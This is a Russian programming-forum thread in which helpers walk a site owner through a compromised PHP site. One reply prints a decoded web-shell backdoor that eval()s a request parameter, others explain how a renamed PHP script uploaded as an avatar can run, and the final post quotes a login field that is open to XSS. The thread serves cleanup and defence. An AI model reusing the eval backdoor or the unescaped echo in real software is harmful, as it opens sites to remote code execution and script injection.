Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 27.02.2018, 16:05   #21
Serge_Bliznykov
Старожил
 
Регистрация: 09.01.2008
Сообщений: 26,238
По умолчанию

Цитата:
Сообщение от Сергей 163 Посмотреть сообщение
Одна из дыр я так понимаю?
именно это и есть одна из дверей, через которые и можно проникать к вам внутрь.

удаляйте!!!

и вот как это декодируется - ТЫЦ
или тут - ТЫЦ
Цитата:
Код:

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

Последний раз редактировалось Serge_Bliznykov; 27.02.2018 в 16:10.
Serge_Bliznykov вне форума Ответить с цитированием
Старый 27.02.2018, 16:07   #22
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

Цитата:
Сообщение от Сергей 163 Посмотреть сообщение
Что скажите на это? Очень много кода base64
Одна из дыр я так понимаю?
А еще там ваш любимый евал... но это как подметание за человеком, который ходить в вымазанных сапогах по вашей квартире.
p51x на форуме Ответить с цитированием
Старый 27.02.2018, 16:13   #23
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Есть одна дыра наверное, вообщем пользователи могут загружать аватарку и она естественно идёт на сервер.
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 16:16   #24
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,758
По умолчанию

Сергей 163, ну и посмотрите в той папке что )) там же по датам изменения файлов всё видно где когда что изменили. самые ранние даты - откуда всё началось )

в настройках сервера должно быть запрещено запускать скрипты в этой папке, htaccess можно настроить, а так для небольшого проекта можно было бы и в базу просто заливать аватарку.
Alar вне форума Ответить с цитированием
Старый 27.02.2018, 16:16   #25
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Понято)

Цитата:
Сообщение от Alar Посмотреть сообщение
Сергей 163, ну и посмотрите в той папке что )) в настройках сервера должно быть запрещено запускать скрипты в эту папке, htaccess, например можно настроить, а так для небольшого проекта можно было бы и в базу просто заливать аватарку.
Я удалил все содержимое из этой папки,там были png,gif, ну и просто картинки. Могли я думаю через png прописаться(
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 16:20   #26
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,758
По умолчанию

Цитата:
Сообщение от Сергей 163 Посмотреть сообщение
через png прописаться
Может я чего не знаю, но как? ))
Alar вне форума Ответить с цитированием
Старый 27.02.2018, 16:24   #27
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

Цитата:
Сообщение от Alar Посмотреть сообщение
Может я чего не знаю, но как? ))
Просто переименованный php-скрипт, а сервер настроен выполнять все из любой папки.
p51x на форуме Ответить с цитированием
Старый 27.02.2018, 16:25   #28
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,758
По умолчанию

Цитата:
Сообщение от p51x Посмотреть сообщение
Просто переименованный php-скрипт
а ну тогда не важно png или jpg. или нет? ) тот же execom меня постоянно этими png картиками пугал, что туда прямо в картинку можно вирус для винды вписать.
Alar вне форума Ответить с цитированием
Старый 27.02.2018, 16:32   #29
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

если позволено загружать и то, и то тогда пофик
p51x на форуме Ответить с цитированием
Старый 27.02.2018, 18:24   #30
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

<td align="center" style="padding:3px;"><input name="login" type="text" placeholder="Пользователь (4-10 символов)" size="25" maxlength="10" class="lg" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>
Подскажите ,что не так ругается на- XSS

Последний раз редактировалось Сергей 163; 27.02.2018 в 19:12.
Сергей 163 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взломали системный файл hosts Restman Общие вопросы C/C++ 2 18.07.2015 05:35
Взломали сайт ruslan0 Безопасность, Шифрование 6 01.10.2011 18:34
Взломали почту на яндексе, что делать? Яр|/||< (^_^) Безопасность, Шифрование 4 17.07.2010 20:53
QIP взломали OrdJONY Свободное общение 12 09.05.2009 12:12